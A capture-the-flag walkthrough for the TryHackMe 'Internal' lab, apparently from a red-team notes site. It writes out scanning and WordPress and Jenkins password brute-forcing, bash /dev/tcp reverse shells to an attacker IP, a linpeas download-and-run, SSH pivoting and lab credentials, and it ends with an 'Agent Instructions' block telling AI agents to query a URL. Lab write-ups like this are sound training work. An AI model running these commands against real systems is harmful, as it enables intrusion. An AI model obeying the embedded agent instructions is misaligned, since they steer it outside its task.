# Internal **Room Link:** ## Scanning ### Initial Scan

nmap -A 10.10.46.54

### Scan all ports No other ports found.

nmap -p- 10.10.46.54

### TCP/80 - HTTP ``` gobuster dir -u http://10.10.46.54 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt -t 30 ```

Wordpress is running under both /blog and /wordpress. /blog has a login page ``` wpscan --url http://10.10.46.54 wpscan --url http://10.10.46.54/blog --passwords /usr/share/wordlists/rockyou.txt ```

#### Credentials found

Username: admin 
Password: my2boys

Trying to login the page redirects to internal.htm so I add that to the host file. ``` vi /etc/hosts ```

We are able to successfully get into wordpress with the credentials

Reverse Shell Failed Attempt revshell.php code ``` & /dev/tcp/10.10.120.18/443 0>&1'"); ?> ``` ``` vi revshell.php zip revshell.zip revshell.php nc -lvnp 443 ```

Unable to upload the plugin due to write issues

## Reverse Shell TWENTY SEVENTEEN theme had a writable pages so I modified the 404 page with a reverse shell and then navigated to a page that does not exist.

Just added the revshell.php code mentioned earlier.

**Kali** ``` nc -lvnp 443 ``` **Browser** A page that doesn't exist to trigger the reverse shell. ``` http://www.internal.thm/blog/index.php/2020/08/03/hello-worlgd/ ```

Get full TTY shell

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

### LinPeas **Kali** ``` python2 -m SimpleHTTPServer 81 ``` **Victim** ``` cd /tmp/ wget http://10.10.120.18:81/linpeas.sh chmod +x linpeas.sh ./linpeas.sh ``` Linpeas was able to find two sets of credentials. phpmyadmin credentials worked. ``` phpmyadmin Username: phpmyadmin Password: B2Ud4fEOZmVq note Username: aubreanna Password: bubb13guM!@#123 ``` The note for Bill ``` cat /opt/wp-save.txt ```

Able to ssh in with the credentials. There is a file that says that Jenkins is running and we can confirm that is is running with netstat as well. ``` ssh aubreanna@10.10.46.54 Password: bubb13guM!@#123 cat jenkins.txt netstat -tuan ```

### Pivot From Kali I am now able to reach the Jenkins server **Option #1** For the rest of guide I used this option. ``` apt install sshuttle sshuttle -r aubreanna@10.10.46.54 127.0.0.1/24 Password: bubb13guM!@#123 ```

**Option #2** If I followed this way jenkins would be redirected to port 4444 on kali. ``` ssh -L 4444:172.17.0.2:8080 aubreanna@10.10.46.54 Password: bubb13guM!@#123 ``` ### Bruteforce After checking for some time I couldn't find any files with credentials that worked and the jenkins server is being ran on docker and I had no access to anything for that so I resorted to using hydra. What I did was tried logging in with fake credentials than seeing the request and copying the info I needed to start bruteforcing. ``` File: /j_acegi_security_check Request Body: j_username=test&j_password=pass&from=%2F&Submit=Sign+in Failed login message: Invalid username or password ```

The default hydra was giving false positives and not getting the correct credentials so I downloaded from gitlab and ran the bruteforcing again. ``` git clone https://github.com/vanhauser-thc/thc-hydra.git cd thc-hydra/ ./configure make make install ./hydra 127.0.0.1 -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt ``` Credentials were found.

``` Username: admin Password: spongebob ``` ### Jenkins Web

Just added a reverse shell to the job and ran it. ``` /bin/bash -c 'bash -i >& /dev/tcp/10.10.120.18/443 0>&1' ```

**Kali** Setup a listener ``` nc -lvnp 443 ```

## Privilege Escalation There was a note under opt for Aubreanna that had the credentials for root.

``` Username: root Password: tr0ub13guM!@#123 ``` Tried logging in with the credentials with ssh and it worked.

ssh root@10.10.56.152
Password: tr0ub13guM!@#123

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/internal.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.